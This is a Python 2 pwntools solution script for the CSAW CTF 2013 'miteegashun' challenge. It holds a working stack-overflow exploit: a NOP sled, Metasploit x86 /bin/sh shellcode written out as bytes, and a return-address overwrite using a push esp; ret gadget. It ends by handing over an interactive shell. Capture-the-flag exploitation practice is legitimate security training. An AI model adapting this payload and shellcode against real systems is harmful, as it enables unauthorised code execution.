#!/usr/bin/env python2
# CSAW CTF Qualification Round 2013: miteegashun-400
# http://shell-storm.org/repo/CTF/CSAW-2013/Exploitation/
"""Solution script for the CSAW 2013 "miteegashun" challenge binary.

The script builds a single stack-overflow payload (NOP sled + shellcode +
padding + overwritten return address) and sends it to a local copy of the
challenge binary over pwntools' process() wrapper, then hands the
connection to the user. Everything below depends on Python 2 semantics,
where str literals such as '\\x90' are raw bytes; under Python 3 the
payload and recvuntil() marker would have to be bytes literals.

Why this works (and what would stop it): the challenge binary has a
fixed-size stack buffer with no length check, the stack is executable,
the binary is not position independent and there is no stack canary, so
a known `push esp ; ret` gadget can be used to land on the injected
code. Any one of NX, stack protector, or PIE/ASLR on the binary would
break this specific payload layout.
"""
from pwn import *
# Distance from the start of the input buffer to the saved return address.
# Found with pattern_create/pattern_offset in PEDA (gdb-peda$ patto).
# gdb-peda$ patto 0x4373416e
# 1131626862 found at offset: 417
offset = 417
# Distance from the start of the input buffer to the start of the data that
# ESP points at when the overwritten return address is used; the extra 4 + 4
# accounts for the two machine words sitting between the pattern hit and the
# stack pointer at that moment (presumably the popped return address and one
# further word -- TODO confirm against the binary's epilogue).
# gdb-peda$ patto HA%d
# HA%d found at offset: 264
offset_shellcode = 264 + 4 + 4
# ROP-style trampoline inside the non-PIE binary: `push esp ; ret` jumps
# to whatever ESP points at after the function returns, i.e. into the sled.
# 0x0805c6b1: push esp ; ret ; (5 found)
addr_push_esp_ret = 0x0805c6b1
# 32-bit Linux exec shellcode generated by Metasploit with the NUL byte
# excluded so it survives C string handling (see the msf commands below).
# msf > use payload/linux/x86/exec
# msf payload(exec) > generate -b '\x00' -t python -o CMD=/bin/sh
shellcode = ''
shellcode += '\xbb\x55\x28\xf8\x3d\xdd\xc5\xd9\x74\x24\xf4\x5d\x33'
shellcode += '\xc9\xb1\x0b\x31\x5d\x15\x83\xed\xfc\x03\x5d\x11\xe2'
shellcode += '\xa0\x42\xf3\x65\xd3\xc1\x65\xfe\xce\x86\xe0\x19\x78'
shellcode += '\x66\x80\x8d\x78\x10\x49\x2c\x11\x8e\x1c\x53\xb3\xa6'
shellcode += '\x17\x94\x33\x37\x07\xf6\x5a\x59\x78\x85\xf4\xa5\xd1'
shellcode += '\x3a\x8d\x47\x10\x3c'
# Run the challenge binary locally (relative path: the script expects to be
# started from the directory that holds ./miteegashun).
r = process('./miteegashun')
# Wait for the program's banner before sending anything, so the payload is
# consumed by the vulnerable read rather than an earlier one.
r.recvuntil('prove me wrong\n')
# Payload layout (all offsets relative to the start of the input buffer):
#   [0, offset_shellcode)          NOP sled up to where ESP will point
#   [offset_shellcode, +len(sc))   the shellcode itself
#   [.., offset)                   NOP padding up to the saved return address
#   [offset, offset + 4)           saved EIP -> push esp ; ret gadget
# Note that if len(payload) ever exceeded `offset`, the padding term below
# would silently become an empty string and the return address would land
# in the wrong place; the constants above keep that from happening here.
payload = ''
payload += '\x90' * offset_shellcode
payload += shellcode
payload += '\x90' * (offset - len(payload))
payload += p32(addr_push_esp_ret)
r.sendline(payload)
# Drain any pending output so the interactive prompt starts clean.
r.clean()
r.interactive()